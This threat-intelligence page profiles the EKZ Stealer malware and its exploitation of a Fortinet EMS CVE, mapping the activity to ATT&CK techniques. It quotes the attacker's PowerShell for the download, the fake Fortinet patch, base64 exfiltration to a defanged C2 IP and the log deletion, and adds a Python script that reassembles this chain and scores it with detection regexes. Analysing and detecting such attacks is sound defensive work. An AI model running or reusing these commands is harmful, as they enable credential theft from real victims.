Malware | Exploits 1 CVE

EKZ Stealer


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2026-35616: Unauthenticated Authentication Bypass in Fortinet FortiClient EMS (exploited in the wild)

Further investigation revealed exploitation of CVE-2026-35616, an improper access control vulnerability affecting Fortinet EMS versions 7.4.5 through 7.4.6. | In May 2026, eSentire's Threat Response Unit (TRU) detected EKZ Stealer within a customer environment... threat actors exploited CVE-2026-35616 in Fortinet EMS ... and was used to harvest browser credentials from Chromium-based browsers and Firefox, before exfiltration by PowerShell.

via eSentire blog (esentire.com)
MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1190 Exploit Public-Facing Application (evidence: 1)

The attack chain begins with threat actors compromising a Fortinet EMS server through CVE-2026-35616, then deploying EKZ Stealer and exfiltrating harvested credentials using PowerShell.

Execution

2 techniques
T1059 Command and Scripting Interpreter (evidence: 1)

The decoded PowerShell can be seen in the code snippet below.

T1059.001 PowerShell (evidence: 1)

The stolen credentials are sent in the body via HTTP POST request (base64 encoded).

Defense Evasion

5 techniques
T1027 Obfuscated Files or Information (evidence: 1)

EKZ Stealer's compiler-based obfuscations (indirect jumps/calls + control-flow flattening) are deobfuscated using Binary Ninja Workflows.

T1036 Masquerading (evidence: 1)

we decoded the PowerShell command ... found that it downloads EKZ Infostealer, disguises it as a Fortinet update (FortiEndpoint_Patch.exe), and executes it.

T1070 Indicator Removal (evidence: 1)

del C:\programdata\log.txt;del C:\programdata\FortiEndpoint_Patch.exe;

T1070.004 File Deletion (evidence: 1)

del C:\programdata\log.txt;del C:\programdata\FortiEndpoint_Patch.exe;

T1497 Virtualization/Sandbox Evasion (evidence: 1)

It then sleeps for 90 seconds to allow the malware to write collected credentials to C:\ProgramData\log.txt, before exfiltrating that file. (The quoted evidence describes the delay as a wait for the stealer to finish writing its output, not as a sandbox or analysis check, so treat this mapping as low confidence.)

Credential Access

2 techniques
T1555 Credentials from Password Stores (evidence: 1)

It was used to harvest browser credentials from Chromium-based browsers and Firefox.

T1555.003 Credentials from Web Browsers (evidence: 1)

The file was compiled with MinGW/GCC and statically links open-source libraries used to extract credentials from Chromium-based browsers and Firefox.

Discovery

1 technique
T1497 Virtualization/Sandbox Evasion (evidence: 1)

It then sleeps for 90 seconds to allow the malware to write collected credentials to C:\ProgramData\log.txt, before exfiltrating that file.

Collection

1 technique
T1560 Archive Collected Data (evidence: 1)

$b=[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\programdata\log.txt"));

(Base64 is an encoding, not compression or archiving; the same line is mapped to T1132 Data Encoding under Command and Control, which is the tighter fit for this evidence.)

Command and Control

2 techniques
T1105 Ingress Tool Transfer (evidence: 1)

$wc = New-Object System.Net.WebClient;$wc.DownloadFile($Url, $Out);

T1132 Data Encoding (evidence: 1)

Within a Wireshark capture, the stolen credentials are sent in the body via HTTP POST request (base64 encoded).

Exfiltration

1 technique
T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol (evidence: 1)

$wc.UploadString("hxxp://83.138.53[.]110/service/save.php","POST",$b);
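As an added example (not code from the eSentire write-up or from Mallory), the Python below turns the decoded PowerShell chain quoted across the Execution, Defense Evasion, Collection, Command and Control and Exfiltration sections into two checks: a stage scorer run over PowerShell script-block text, and a decoder that recovers the exfiltrated file from the base64 HTTP POST body. The script-block text, the benign comparison script, the download URL (example.invalid) and the log contents are constructed for this example; the C2 host and path are the page's defanged values.

```python
"""Stage scorer for the EKZ downloader chain and decoder for its exfil POST body.
Added example, not code from the eSentire write-up or Mallory."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One regex per stage of the chain quoted on this page. A script block that hits
# several stages is far stronger evidence than any single call.
STAGE_PATTERNS = {
    "download": re.compile(r"System\.Net\.WebClient.*?\.DownloadFile\(", re.I | re.S),
    "masquerade": re.compile(r"Forti\w*_Patch\.exe", re.I),
    "encode": re.compile(r"ToBase64String\(\s*\[IO\.File\]::ReadAllBytes\(", re.I),
    "exfil": re.compile(r"\.UploadString\([^,]+,\s*['\"]POST['\"]", re.I),
    "cleanup": re.compile(r"\bdel\s+C:\\programdata\\", re.I),
}


@dataclass
class Verdict:
    source: str
    stages: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # DownloadFile alone is routine in admin scripts; three stages is the bar.
        return len(self.stages) >= 3


def classify_script_block(script: str, source: str = "unknown") -> Verdict:
    """Score one PowerShell script block (e.g. the text of an Event ID 4104 record)."""
    verdict = Verdict(source)
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(script):
            verdict.stages.append(stage)
    return verdict


def decode_exfil_post(raw: bytes) -> Optional[dict]:
    """Parse a raw HTTP request and base64-decode its body the way UploadString
    sends it. Returns None unless it is a POST whose whole body is clean base64."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or parts[0] != b"POST":
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode(errors="replace")] = value.strip().decode(errors="replace")
    try:
        payload = base64.b64decode(body, validate=True)
    except binascii.Error:
        return None
    return {"path": parts[1].decode(errors="replace"), "host": headers.get("host", ""), "payload": payload}


# Constructed sample: the decoded downloader reassembled from the fragments quoted
# on this page. The download URL is a placeholder; the C2 is the page's defanged value.
SAMPLE_SCRIPT_BLOCK = r"""
$Url='http://example.invalid/update.bin';$Out='C:\programdata\FortiEndpoint_Patch.exe';
$wc = New-Object System.Net.WebClient;$wc.DownloadFile($Url, $Out);
Start-Process $Out;Start-Sleep -Seconds 90;
$b=[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\programdata\log.txt"));
$wc.UploadString("hxxp://83.138.53[.]110/service/save.php","POST",$b);
del C:\programdata\log.txt;del C:\programdata\FortiEndpoint_Patch.exe;
"""

# Constructed benign comparison: a routine admin download, one stage only.
BENIGN_SCRIPT_BLOCK = r"""
$wc = New-Object System.Net.WebClient;$wc.DownloadFile('http://example.invalid/tool.zip','C:\Temp\tool.zip');
"""

# Constructed stand-in for C:\ProgramData\log.txt with fake credentials.
SAMPLE_LOG = b"URL: https://intranet.example/login\nUSER: jdoe\nPASS: Winter2026!\n"
_B64 = base64.b64encode(SAMPLE_LOG)
SAMPLE_POST = (
    b"POST /service/save.php HTTP/1.1\r\nHost: 83.138.53[.]110\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_B64)
) + _B64


if __name__ == "__main__":
    for name, block in (("sample", SAMPLE_SCRIPT_BLOCK), ("benign", BENIGN_SCRIPT_BLOCK)):
        v = classify_script_block(block, name)
        print(f"{v.source}: stages={v.stages} suspicious={v.suspicious}")
    req = decode_exfil_post(SAMPLE_POST)
    print(f"POST {req['path']} to {req['host']}: {req['payload'].decode()!r}")
```

Script-block text comes from Event ID 4104 records only when PowerShell script block logging is enabled, so check that first. The scorer deliberately requires three stages because a WebClient.DownloadFile by itself is common in legitimate administration. For network telemetry, feed the raw request from a proxy log or a PCAP export; a plain-HTTP POST to a bare IP whose entire body is clean base64 is itself worth a look even before the body is decoded.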

INDICATORS OF COMPROMISE

IOCs tracked for this family

4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
2 tracked

Other indicator types observed in public reporting.

Type | Value | Latest sighting
hash.sha256 | (masked; full value available in Mallory) | 6 days ago
ip.v4 | (masked; full value available in Mallory) | 6 days ago
uri | (masked; full value available in Mallory) | 6 days ago
uri | (masked; full value available in Mallory) | 6 days ago